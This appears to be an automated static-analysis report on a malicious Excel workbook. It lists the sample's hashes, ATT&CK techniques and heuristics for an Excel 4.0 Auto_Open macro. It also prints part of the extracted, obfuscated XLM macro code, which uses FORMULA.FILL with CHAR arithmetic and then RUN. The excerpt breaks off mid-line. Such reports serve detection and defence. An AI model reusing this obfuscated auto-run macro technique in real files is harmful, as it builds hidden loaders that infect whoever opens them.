Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f6372036534f05e7…

MALICIOUS

Office (OLE)

174.0 KB Created: 2020-05-12 12:47:52 Authoring application: Microsoft Excel First seen: 2020-08-10
MD5: 304ee78dcb8f3a4555d420eac718c2bd SHA-1: cf4c718e65812bdcfcb3c1ba84311edc59d23253 SHA-256: f6372036534f05e79a1baa3a56d634e0c71e2f3a71f495225c43d8b137ea1016
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The file contains Excel 4.0 macros, specifically an Auto_Open macro that utilizes dangerous functions like FORMULA.FILL and RUN. This indicates the macro is designed to execute arbitrary commands, likely to download and execute a second-stage payload. The specific functions used suggest a capability for arbitrary code execution.

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 126368 bytes
SHA-256: fec3e0cc333456308248b9bf839af4c265edb7689796b85747e375c5a9cd1457
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     14 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  Sheet
' 0018     28 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open hidden len=7 ptgRef3d  Sheet!JP56538 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' Sheet,Reference,Formula,Value
'  Sheet,ET27,"",-387.00000000000000000000
'  Sheet,DI60,"",0.11489898989898990334
'  Sheet,DX80,"",-6.65853658536585335526
'  Sheet,HM89,"",-1233.00000000000000000000
'  Sheet,CM135,"",0.06691919191919191989
'  Sheet,HI136,"FORMULA.FILL(CHAR(IX23620+HJ21030)&CHAR(GW8191/EP31778)&CHAR(GW8191/Z15383)&CHAR(ES57153-F28575)&CHAR(FD23243*BA24624)&CHAR(FJ38391-HW40705)&CHAR(FJ38391/GH18825)&CHAR(FH56526*M21719)&CHAR(IX23620*EK45308)&CHAR(IQ8401-FO64536)&CHAR(FA19183*DQ5744)&CHAR(FD23243/GU65340)&CHAR(FJ38391+HE32401)&CHAR(GW8191-DH58173)&CHAR(HV50424-BC53248)&CHAR(FA19183/D6996)&CHAR(FJ38391*FQ12443)&CHAR(FA19183-E55930)&CHAR(FH56526/JS29981)&CHAR(HF61404/HU60974)&CHAR(IX23620/CL39643)&CHAR(FD23243/DK3762)&CHAR(FH56526*DS4617)&CHAR(HV50424-BG63175)&CHAR(IX23620/DX60757)&CHAR(IQ8401-FC12701)&CHAR(GW8191-FT56026)&CHAR(HV50424/HU29721)&CHAR(GW8191+CH3577)&CHAR(IQ8401*FH55986)&CHAR(HF61404-FN10223)&CHAR(GW8191/CU58195)&CHAR(IX23620*HK57622)&CHAR(HF61404-J33493)&CHAR(FH56526/CF31678)&CHAR(HV50424*JC2567)&CHAR(FH56526/CP23600)&CHAR(HV50424*T50483)&CHAR(ES57153+BM38241)&CHAR(HV50424*A35410)&CHAR(FA19183+CD19846)&CHAR(FJ38391*HY46334)&CHAR(FD23243+J8921)&CHAR(FA19183+DC14606)&CHAR(HF61404/DJ11039)&CHAR(FD23243*JN52331)&CHAR(FD23243+D35747)&CHAR(IQ8401+EW47866)&CHAR(ES57153*DU15292)&CHAR(HV50424/CZ47707)&CHAR(FA19183/DI41272)&CHAR(HF61404*CB42660)&CHAR(FJ38391+HP52268)&CHAR(HV50424+IW57930)&CHAR(FJ38391/BI32942)&CHAR(GW8191+FX46326)&CHAR(HF61404+HS43283)&CHAR(FA19183*JT58041)&CHAR(GW8191*FP52849)&CHAR(HF61404-EQ36902)&CHAR(HV50424+EA4870)&CHAR(HF61404+FV64571)&CHAR(GW8191*FB742)&CHAR(FA19183+A47713)&CHAR(FA19183/GM9925)&CHAR(FA19183*CG27558)&CHAR(IQ8401-FE21407)&CHAR(HF61404/R49595)&CHAR(FD23243*HH62258)&CHAR(IQ8401*IH50125)&CHAR(FH56526+CH6448)&CHAR(IQ8401+HY65217)&CHAR(HV50424+FB10005),IO51666)",""
'  Sheet,HI137,RUN(HY31532),""
'  Sheet,DD179,"",-0.82500061035156246891
'  Sheet,EO193,"",15.84000976562500007105
'  Sheet,P257,"",-351.00000000000000000000
'  Sheet,JF259,"",-0.59420289855072461194
'  Sheet,HS297,"",-8.19512195121951236843
'  Sheet,EA340,"",429.00000000000000000000
'  Sheet,DG365,"",-0.26737967914438504069
'  Sheet,L395,"",-133.00000000000000000000
'  Sheet,CA399,"",-0.46524064171122997413
'  Sheet,IP532,"",129.00000000000000000000
'  Sheet,CZ548,"",-187.00000000000000000000
'  Sheet,FX566,"",0.57647158823529409677
'  Sheet,GT581,"",0.22982456140350876472
'  Sheet,FJ584,"",-749.00000000000000000000
'  Sheet,IZ655,"",1244.00000000000000000000
'  Sheet,EA684,"",-738.00000000000000000000
'  Sheet,DP693,"",-429.00000000000000000000
'  Sheet,CO707,"",4.54166666666666696273
'  Sheet,FH717,"",-243.00000000000000000000
'  Sheet,U741,"",-2.14942528735632176762
'  Sheet,FB742,"",-0.50000000000000000000
'  Sheet,BN803,"",0.14526315789473684403
'  Sheet,GS938,"",228.50000000000000000000
'  Sheet,HZ1006,"",-5.35294117647058786957
'  Sheet,HI1019,"FORMULA.FILL(CHAR(HF61404-IN43212)&CHAR(FA19183+HC27342)&CHAR(IQ8401*JI14429)&CHAR(FA19183-P33044)&CHAR(IX23620*BE27894)&CHAR(GW8191*HN30973)&CHAR(FA19183/L15384)&CHAR(IQ8401*DD13291)&CHAR(FH56526+HA52672)&CHAR(ES57153+IO29564)&CHAR(HV50424+DA34052)&CHAR(GW8191/V36501)&CHAR(FH56526-GJ12094)&CHAR(FJ38391+BP40233)&CHAR(HF61404/BZ46635)&CHAR(FA19183*HQ49313)&CHAR(HF61404*HE34848)&CHAR(ES57153*BV62862)&CHAR(HF61404+EM24181)&CHAR(FD23243+GA30501)&CHAR(IX23620-HO10294)&CHAR(IX23620+JR46763)&CHAR(HF61404*IN6118)&CHAR(IX23620+CV23444)&CHAR(FA19183+GC22906)&CHAR(FJ38391/EV37055)&CHAR(FA19183-N32578)&CHAR(GW8191/JA28359)&CHAR(FA19183-FM15564)&CHAR(FA19183+BV9113)&CHAR(FH56526/HB4470)&CHAR(IX23620-EM53088)&CHAR(IQ8401+JU4
... (truncated)